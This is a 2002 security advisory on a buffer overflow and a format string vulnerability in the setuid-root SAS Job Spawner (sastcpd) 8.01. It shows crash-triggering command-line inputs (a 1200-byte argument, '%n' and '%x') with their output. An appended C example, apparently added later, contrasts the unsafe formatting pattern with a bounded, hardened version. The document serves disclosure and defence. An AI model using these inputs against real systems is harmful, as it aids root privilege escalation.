From: Wodahs Latigid (wodahsmail.com)
Date: Tue Jan 29 2002 - 03:59:41 CST

    ----------------------------------------------------------
    sastcpd Buffer Overflow and Format String Vulnerabilities
    Ministry-of-Peace - www.ministryofpeace.co.uk
    ----------------------------------------------------------

    SYNOPSIS

    "SAS software provides the foundation, tools, and
    solutions for data analysis, report generation,
    and enterprise-wide information delivery."

    The "SAS Job Spawner", sastcpd, contains both a buffer
    overflow and a format string vulnerability.

    SAS Support say that these problems were fixed in version
    8.2 of this product, but we are unable to confirm as we
    do not have access to this version.

    IMPACT

    sastcpd is installed setuid root by default, and therefore
    full root privileges can be obtained through exploitation
    of either of these vulnerabilities.

    DETAILS

    Version tested:
    SAS Job Spawner for Open Systems version 8.01

    $ sastcpd `perl -e "print 'A' x 1200"`
    Invalid argument: AAAA[..cut..]AAAA.
    Segmentation fault (core dumped)
    $ ls -la core
    -rw------- 1 root teknix 1454382 Jan 28 04:22 core
    $ sastcpd %n
    Segmentation fault (core dumped)
    $ sastcpd %x
    Invalid argument: 2.

    CREDITS

    Vulnerability discovered by Digital Shadow

    INFO

    Security Advisory #05
    Published: 29th January 2002

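The crash on a 1200-byte argument and the `%x` argument printing as `2` are consistent with a command-line argument being copied into a fixed-size buffer and then used as a printf format string. The following is an added example of that bug class and its fix, not code from the advisory or from SAS; the function names, `MSG_MAX` and the commented "before" pattern are assumptions, since the sastcpd source is not shown on the page.

```c
#include <stdio.h>
#include <string.h>

#define MSG_MAX 256 /* assumed size; the real buffer size is not on the page */

/* Pattern consistent with the advisory's output (assumed, not SAS source):
 *     char msg[MSG_MAX];
 *     sprintf(msg, "Invalid argument: %s.\n", arg);   unbounded copy
 *     printf(msg);                                    arg used as format
 * Hardened form: bounded write, argument passed as data only.
 * Returns 0 if the message fit, 1 if truncated, -1 on bad parameters. */
int format_invalid_arg(char *out, size_t outsz, const char *arg)
{
    int n;

    if (out == NULL || outsz == 0 || arg == NULL)
        return -1;
    /* snprintf writes at most outsz bytes and always NUL-terminates. */
    n = snprintf(out, outsz, "Invalid argument: %s.\n", arg);
    if (n < 0)
        return -1;
    return (size_t)n >= outsz ? 1 : 0;
}

/* Print the message without ever using caller data as a format string. */
int report_invalid_arg(FILE *fp, const char *arg)
{
    char msg[MSG_MAX];
    int rc = format_invalid_arg(msg, sizeof msg, arg);

    if (rc < 0)
        return rc;
    fputs(msg, fp);                 /* fputs does no format processing */
    if (rc == 1)
        fputs("[truncated]\n", fp);
    return rc;
}

int main(void)
{
    char big[1201];                 /* constructed: the advisory's 1200 'A's */

    memset(big, 'A', 1200);
    big[1200] = '\0';
    report_invalid_arg(stdout, "%x");
    report_invalid_arg(stdout, "%n");
    report_invalid_arg(stdout, big);
    return 0;
}
```

With this form, `%x` and `%n` are echoed literally and the oversized argument is truncated at the buffer boundary instead of overwriting adjacent memory.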